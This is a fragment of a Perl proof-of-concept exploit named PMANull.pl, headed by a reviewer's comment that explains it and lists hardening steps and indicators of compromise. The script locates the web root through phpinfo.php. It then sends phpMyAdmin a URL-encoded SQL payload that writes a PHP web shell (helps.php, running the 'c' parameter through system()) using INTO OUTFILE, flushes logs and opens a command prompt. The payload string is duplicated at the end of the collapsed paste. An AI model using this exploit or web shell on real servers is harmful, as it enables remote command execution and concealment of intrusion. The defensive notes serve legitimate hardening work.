# NOTE(review): this listing is a fragment of a proof-of-concept script (the
# usage banner below names it PMANull.pl). It starts inside the usage block
# and is cut off inside the CMDS loop. The paste has also collapsed the
# script onto a few physical lines, so each '#' now comments out whatever
# follows it on the same line. The text is kept exactly as published.
#
# What the visible code does:
#   1. Reads <site> <path> <do> from @ARGV, removes "http://" from the site
#      argument, and jumps straight to the CMDS loop when <do> is 2.
#   2. Connects to TCP port 80 and requests <path>phpinfo.php through
#      httpcon() (defined outside this fragment). It scans the reply for the
#      System, safe_mode and SCRIPT_FILENAME rows; the last one yields the
#      server-side directory, stored in $path. If nothing usable is found
#      the operator is asked to type the path.
#   3. POSTs a sql_query to <path>read_dump.php that creates a scratch
#      table, stores PHP source in it, writes it out with
#      SELECT ... INTO OUTFILE to $path/helps.php, drops the table and runs
#      FLUSH LOGS. The stored PHP holds an upload form (saved as
#      entrika.php) and hands the "c" request parameter to system().
#   4. Walks the reply looking for phpMyAdmin's Error block ($sqlerror goes
#      1 -> 2 between the heading and the <pre> body) and dies after
#      printing it. Otherwise it reports the written file, exits when <do>
#      is 1, and enters a command prompt loop ('anquit' ends it). The rest
#      of that loop is not visible here.
#
# Defensive reading (conditions inferred from the banner and the SQL, not
# stated in the code):
#   - The banner says "Null password": the POST carries no credentials, so
#     it only works where phpMyAdmin logs in with a passwordless MySQL
#     account. Give every account a password and keep phpMyAdmin's
#     AllowNoPassword setting disabled; restrict who can reach the
#     phpMyAdmin URL at all.
#   - INTO OUTFILE needs the FILE privilege and a directory the database
#     server may write to. Revoke FILE from web-facing accounts, set
#     secure_file_priv to a directory outside the document root, and keep
#     the document root unwritable for the database service user.
#   - The path discovery relies on a world-readable phpinfo.php; remove
#     such diagnostic pages from production hosts.
#   - Indicators taken from this page: files named helps.php or entrika.php
#     appearing next to phpMyAdmin, POSTs to read_dump.php whose sql_query
#     contains INTO OUTFILE, and GET requests to helps.php carrying a "c"
#     parameter. The query ends with FLUSH LOGS, so ship database and web
#     logs off-host rather than trusting local copies.
print q{ ________________________________________________ Exploit for phpMyAdmin Null password Usage: perl PMANull.pl <site> <path> <do> Example: perl PMANull.pl www.target.com / 0 ________________________________________________ }; exit; } $ip = $ARGV[0]; $http = $ARGV[1]; $ip =~ s/(http:\/\/)//eg; $id = $ARGV[2]; $http .= "phpinfo.php"; $num = 0; if($id==2) { goto CMDS; } #$data = "username=andrejiao&from_url=%3C%7Bfrom_url%7D%3E&submit=Send+%3 E+%3E"; #$idata = (length($data)); $socks = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>"$ip", PeerPort=>'80') or die"[-] Couldn't connect!\n"; print "[+] Connected!\n"; httpcon($socks,"GET",$ip,$http,"!"); print "[+] Exploiting Target \r\n"; while($ans = <$socks>){ if($ans =~ /<tr><td class="e">System <\/td><td class="v">(.*)<\/td><\/tr>/) { print "[+] System Info: $1\r\n"; $num++; } if($ans =~ /<tr><td class="e">safe_mode<\/td><td class="v">(.*)<\/td><td class="v">/){ print "[+] Safe Mode: $1\r\n"; $num++; } if($ans =~ /_SERVER\["SCRIPT_FILENAME"\]<\/td><td class="v">(.*)\/phpinfo.php<\/td>/){ print "[+] Path: $1\r\n"; $path = $1; $num++; } } if(($num<3) && (!defined($path))) { print 'PHPInfo.php was not found\r\n'; print 'Would you like to continue <Y/N>:'; $tah = <STDIN>; chomp($tah); if($tah eq "Y") { print 'Please insert script path:'; $path = <STDIN>; } else { die "[+] Bye!\r\n"; } } $idata = "is_js_confirmed=0&lang=en-utf- 8&server=1&collation_connection=utf8_general_ci&db=mysql&pos=0&goto=db_ details.php&zero_rows=Your+SQL+query+has+been+executed+successfully&pre v_sql_query=&sql_query=use+mysql%3B%0D%0ACREATE+TABLE+temptab+ %28codetab+text%29%3B%0D%0AINSERT+INTO+temptab+%28codetab%29+ values+%28%27%3CFORM+ENCTYPE%3D%22multipart%2Fform%2Ddata%2 2+ACTION%3D%22helps%2Ephp%22+METHOD%3D%22POST%22%3E%3CI NPUT+TYPE%3D%22hidden%22+name%3D%22MAX%5FFILE%5FSIZE%22 +value%3D%22100000%22%3EUpload+this+file%3A+%3CINPUT+NAME%3D %22userfile%22+TYPE%3D%22file%22%3E%3CINPUT+TYPE%3D%22submit 
%22+VALUE%3D%22Send%22%3E%3C%2FFORM%3E%3C%3Fphp+move% 5Fuploaded%5Ffile%28%24userfile%2C+%22entrika%2Ephp%22%29%3B+%3F %3E%3C%3Fphp+if+%28%21empty%28%24%5FGET%5B%22c%22%5D%29 %29+%7B+echo+%22%3Cpre%3E%22%3B+system%28%24%5FGET%5B%22c %22%5D%29%3B+echo+%22%3C%2Fpre%3E%22%3B+%7D+exit%3B+%3F %3E%27%29%3B%0D%0ASELECT+%2A+INTO+OUTFILE+%27$path%2Fhel ps%2Ephp%27+from+temptab%3B%0D%0ADROP+TABLE+temptab%3B%0D %0AFLUSH+LOGS%3B+&show_query=1&SQL=Go&sql_file=&MAX_FILE_S IZE=16777216&sql_file_compression&charset_of_file=utf8"; $http = $ARGV[1]; $http .= "read_dump.php"; #$http .= "import.php"; $socks = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>"$ip", PeerPort=>'80') or die"[-] Couldn't connect!\n"; httpcon($socks,"POST",$ip,$http,$idata); while($ans = <$socks>){ if($ans =~ /<p><b>Error<\/b><\/p>/){ print "[-] Error was found!\r\n"; $sqlerror = 1; } if(($sqlerror==2) && ($ans =~ /<\/pre>/)){ $sqlerror=0; die "[-] Error!\r\n"; } if($sqlerror==2){ print "[-] Error: $ans"; } if(($sqlerror==1) && ($ans =~ /<pre>/)){ $sqlerror=2; } } print "[+] Shell Injected: $ip/$ARGV[1]/helps.php"; if($id==1) { die "[+] Bye!\r\n"; } CMDS: while (1){ $cout = 0; print "\r\nCMD> "; $cmd = <STDIN>; chomp($cmd); if(($cmd eq 'anquit') || (!defined($cmd))){ die "[+] Bye!"; } . 
"is_js_confirmed=0&lang=en-utf- 8&server=1&collation_connection=utf8_general_ci&db=mysql&pos=0&goto=db_ details.php&zero_rows=Your+SQL+query+has+been+executed+successfully&pre v_sql_query=&sql_query=use+mysql%3B%0D%0ACREATE+TABLE+temptab+ %28codetab+text%29%3B%0D%0AINSERT+INTO+temptab+%28codetab%29+ values+%28%27%3CFORM+ENCTYPE%3D%22multipart%2Fform%2Ddata%2 2+ACTION%3D%22helps%2Ephp%22+METHOD%3D%22POST%22%3E%3CI NPUT+TYPE%3D%22hidden%22+name%3D%22MAX%5FFILE%5FSIZE%22 +value%3D%22100000%22%3EUpload+this+file%3A+%3CINPUT+NAME%3D %22userfile%22+TYPE%3D%22file%22%3E%3CINPUT+TYPE%3D%22submit %22+VALUE%3D%22Send%22%3E%3C%2FFORM%3E%3C%3Fphp+move% 5Fuploaded%5Ffile%28%24userfile%2C+%22entrika%2Ephp%22%29%3B+%3F %3E%3C%3Fphp+if+%28%21empty%28%24%5FGET%5B%22c%22%5D%29 %29+%7B+echo+%22%3Cpre%3E%22%3B+system%28%24%5FGET%5B%22c %22%5D%29%3B+echo+%22%3C%2Fpre%3E%22%3B+%7D+exit%3B+%3F %3E%27%29%3B%0D%0ASELECT+%2A+INTO+OUTFILE+%27$path%2Fhel ps%2Ephp%27+from+temptab%3B%0D%0ADROP+TABLE+temptab%3B%0D %0AFLUSH+LOGS%3B+&show_query=1&SQL=Go&sql_file=&MAX_FILE_S IZE=16777216&sql_file_compression&charset_of_file=utf8";